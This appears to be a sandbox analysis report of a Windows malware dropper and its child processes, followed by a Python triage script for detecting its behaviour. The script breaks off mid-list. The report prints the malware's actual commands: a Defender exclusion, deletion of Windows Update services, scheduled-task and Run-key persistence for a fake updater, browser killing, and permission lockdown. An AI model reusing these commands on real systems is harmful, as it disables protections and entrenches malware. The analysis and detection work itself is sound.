Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1016 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1016 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 1016 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1016 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1016 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 1016 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1016 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 4968 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 4968 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 4968 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 408 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 408 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 408 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 408 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 408 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 408 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2724 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 976 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 976 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 976 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 976 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 4612 wrote to memory of 3212 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 3212 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3900 wrote to memory of 3380 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 3380 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 2232 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 2232 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4612 wrote to memory of 2152 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 2152 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 3812 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 3812 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4612 wrote to memory of 1844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3900 wrote to memory of 1592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 1592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 4536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 4536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4612 wrote to memory of 1792 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 1792 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 4748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 4748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 3592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 3592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 384 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 384 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe

"C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe"

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\SYSTEM32\taskkill.exe

taskkill /IM chrome.exe /F

C:\Windows\SYSTEM32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC

C:\Program Files\Notepad\Chrome\updater.exe

"C:\Program Files\Notepad\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe zuhwtyqtfkk

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
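
The command lines above record a recognisable staging sequence: the Windows Update services (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc) are stopped and their service keys deleted, sleep and hibernate timeouts are set to zero so the host stays awake, and a PowerShell one-liner registers a scheduled task for C:\Program Files\Notepad\Chrome\updater.exe (falling back to an HKCU Run key when it is not elevated). The following Python is an added example, not code from the sandbox or from this report: it applies simple rules to command lines of this shape and pulls out the task name and binary path an analyst would pivot on. The rule names, function names and the abbreviated sample command lines are this example's own, constructed from the report.

```python
"""Triage rules for Windows process command lines like those recorded above.

Added example, not code from the sandbox or the report. Flags update-service
tampering (sc stop + reg delete of the service key), zeroed sleep/hibernate
timeouts, and scheduled-task or Run-key persistence, and extracts the
artefacts worth pivoting on. Rule names and sample data are this example's own.
"""
import re
from dataclasses import dataclass, field

# Services Windows Update depends on. Limited to the ones tampered with in the
# report; extend for your own environment (assumption).
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}

SC_STOP = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", re.I)
REG_DELETE_SVC = re.compile(
    r'reg(?:\.exe)?\s+delete\s+"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\([^"\s]+)"?\s+/f', re.I)
POWERCFG_ZERO = re.compile(
    r"powercfg(?:\.exe)?\s+/x\s+-((?:hibernate|standby)-timeout-(?:ac|dc))\s+0\b", re.I)
TASK_NAME = re.compile(r"(?:/tn|-TaskName)\s+'([^']+)'", re.I)  # schtasks or Register-ScheduledTask
TASK_EXEC = re.compile(r"(?:/tr|-Execute)\s+'+([^']+)'", re.I)  # /tr '''path''' or -Execute 'path'
RUN_VALUE = re.compile(r'/v\s+"([^"]+)"')
RUN_DATA = re.compile(r"/d\s+'([^']+)'")


@dataclass
class Finding:
    rule: str
    detail: dict = field(default_factory=dict)


def analyze(cmdline: str) -> list[Finding]:
    """Return every finding a single command line triggers."""
    found: list[Finding] = []
    low = cmdline.lower()
    for svc in SC_STOP.findall(cmdline):
        if svc.lower() in UPDATE_SERVICES:
            found.append(Finding("update_service_stopped", {"service": svc.lower()}))
    for svc in REG_DELETE_SVC.findall(cmdline):
        if svc.lower() in UPDATE_SERVICES:
            found.append(Finding("update_service_key_deleted", {"service": svc.lower()}))
    for setting in POWERCFG_ZERO.findall(cmdline):
        found.append(Finding("sleep_timeout_zeroed", {"setting": setting.lower()}))
    if "schtasks" in low or "register-scheduledtask" in low:
        for name in set(TASK_NAME.findall(cmdline)):
            for path in set(TASK_EXEC.findall(cmdline)):
                found.append(Finding("scheduled_task_persistence", {"name": name, "path": path}))
    if "reg add" in low and "currentversion\\run" in low:
        values, data = RUN_VALUE.findall(cmdline), RUN_DATA.findall(cmdline)
        if values and data:
            found.append(Finding("run_key_persistence", {"name": values[0], "path": data[0]}))
    return found


def triage(cmdlines):
    """Aggregate findings over a process tree into a pivot-ready summary."""
    findings = [f for c in cmdlines for f in analyze(c)]

    def pick(rule, key):
        return sorted({f.detail[key] for f in findings if f.rule == rule})

    summary = {
        "services_stopped": pick("update_service_stopped", "service"),
        "service_keys_deleted": pick("update_service_key_deleted", "service"),
        "power_timeouts_zeroed": pick("sleep_timeout_zeroed", "setting"),
        "persistence": sorted({(f.rule, f.detail["name"], f.detail["path"])
                               for f in findings if f.rule.endswith("_persistence")}),
    }
    # Deleting update service keys is destructive and rarely legitimate; paired
    # with a persistence entry for an "updater" binary it is worth escalating.
    summary["escalate"] = bool(summary["service_keys_deleted"] and summary["persistence"])
    return summary


SAMPLE_CMDLINES = [  # constructed from the report's process list; PowerShell shortened
    r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0",
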